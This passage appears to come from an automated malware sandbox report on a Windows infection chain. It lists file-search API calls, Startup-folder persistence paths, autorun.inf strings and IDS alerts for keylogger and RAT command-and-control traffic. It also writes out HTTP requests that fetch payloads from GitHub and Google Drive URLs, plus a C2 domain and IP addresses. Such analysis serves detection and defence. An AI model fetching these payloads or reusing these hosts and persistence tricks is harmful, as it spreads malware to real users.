                                Source: wscript.exe, 00000000.00000003.1311156718.0000019411790000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                Source: wscript.exe, 00000000.00000003.1307643273.0000019411A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: wscript.exe, 00000000.00000003.1307643273.0000019411A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                Source: wscript.exe, 00000000.00000003.1308437430.0000019411CC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: wscript.exe, 00000000.00000003.1308437430.0000019411CC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                Source: update.exe, 00000008.00000000.1309629259.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                                Source: update.exe, 00000008.00000000.1309629259.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: autorun.inf
                                Source: Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                Source: ~$cache1.16.drBinary or memory string: [autorun]
                                Source: ~$cache1.16.drBinary or memory string: autorun.inf
                                Source: RCXD42.tmp.14.drBinary or memory string: [autorun]
                                Source: RCXD42.tmp.14.drBinary or memory string: autorun.inf
                                Source: update.exe.0.drBinary or memory string: [autorun]
                                Source: update.exe.0.drBinary or memory string: autorun.inf
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0013DD92 GetFileAttributesW,FindFirstFileW,FindClose,15_2_0013DD92
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00172044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_00172044
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0017219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_0017219F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_001724A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_001724A9
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00166B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,FindNextFileW,FindClose,FindClose,15_2_00166B3F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00166E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,FindNextFileW,FindClose,15_2_00166E4A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0016F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_0016F350
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0016FD47 FindFirstFileW,FindClose,15_2_0016FD47
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0016FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,15_2_0016FDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008D2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_008D2044
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008D219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_008D219F
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008D24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_008D24A9
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008C6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,22_2_008C6B3F
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008C6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,22_2_008C6E4A
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008CF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_008CF350
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_0089DD92 GetFileAttributesW,FindFirstFileW,FindClose,22_2_0089DD92
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008CFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,22_2_008CFDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008CFD47 FindFirstFileW,FindClose,22_2_008CFD47
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00172044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,31_2_00172044
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0017219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,31_2_0017219F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_001724A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,31_2_001724A9
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00166B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,31_2_00166B3F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00166E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,31_2_00166E4A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0016F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,31_2_0016F350
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0016FD47 FindFirstFileW,FindClose,31_2_0016FD47
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0013DD92 GetFileAttributesW,FindFirstFileW,FindClose,31_2_0013DD92
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0016FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,31_2_0016FDD2
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData
                                Source: excel.exeMemory has grown: Private usage: 5MB later: 73MB

                                Networking

                                Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.7:49840 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:49840 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.7:49828 -> 69.42.215.252:80
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:49940 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:50046 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:50126 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.7:50159 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:50159 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:50201 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:50229 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.7:50240 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:50240 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:50242 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:50241 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:50237 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49842 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49820 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49830 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49874 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49821 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49908 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49858 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49918 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49891 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49931 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49886 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49897 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49875 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49941 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49932 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49899 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49919 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49907 -> 142.250.185.78:443
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 185.199.108.133 443
                                Source: Malware configuration extractorURLs: xred.mooo.com
                                Source: Initial file: .write kpUGCvRO.responseBody
                                Source: Initial file: .savetofile FileName , 2
                                Source: unknownDNS query: name: freedns.afraid.org
                                Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                                Source: Joe Sandbox ViewIP Address: 172.111.138.100 172.111.138.100
                                Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                                Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: global trafficHTTP traffic detected: GET /knkbkk212/knkbkk212/refs/heads/main/JPS.exe HTTP/1.1 | Accept: */* | Accept-Language: en-ch | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: raw.githubusercontent.com | Connection: Keep-Alive
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0017550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,15_2_0017550C
                                Source: global traffic HTTP traffic detected: GET /knkbkk212/knkbkk212/refs/heads/main/JPS.exe HTTP/1.1 Accept: */* Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: raw.githubusercontent.com Connection: Keep-Alive
                                Source: global traffic HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
                                Source: global traffic HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
                                Source: global traffic HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                Source: global traffic HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global traffic HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=bWWimPFpGrpeChM6yW8CpvGPVv6yrbjRK0eN3_LjMzHTwb80_Q0DT0ian8zknRj9_GGPgwV59uu1e1qe5l1ZkmlCQ-aCgVEJ0EBW63qe4DmDCp9uNMwOMqRO4VTJens2XngEbFgR48_Qbw5g-4m3o-cHbDL-yQONhrctr5HWqIc12mjtQJ4TKxg
                                Source: global traffic HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                Source: global traffic HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
